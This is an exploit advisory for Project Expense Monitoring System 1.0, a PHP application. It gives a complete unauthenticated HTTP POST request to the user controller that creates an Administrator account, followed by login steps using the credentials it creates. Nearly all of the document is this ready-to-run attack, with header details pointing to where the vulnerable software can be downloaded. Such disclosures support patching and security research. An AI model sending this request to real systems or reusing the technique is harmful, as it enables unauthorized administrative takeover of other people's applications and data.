Project Expense Monitoring System version 1.0 suffers from an authentication bypass vulnerability that allows for administrative account creation.
5886a72c593de669cd120484467ffafd
# Exploit Title: Project expense Monitoring System | Create Admin Account Unauthorised
# Exploit Author: Richard Jones
# Date: 2021-03-28
# Vendor Homepage: https://www.sourcecodester.com/php/14001/project-expense-monitoring-system-project-php-source-code-2020.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14001&title=Project+Expense+Monitoring+System+Project+in+PHP+With+Source+Code+
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
Steps:
1. Post to application (account create)
POST /pems/module/user/controller.php?action=add HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://TARGET
Connection: close
Upgrade-Insecure-Requests: 1
deptid=&name=hacker&deptid=&username=hax%40hax.com&deptid=&pass=hackor&type=Administrator&save=
2. Login at http://Target/pems/login.php with hacker:hackor as Admin with created account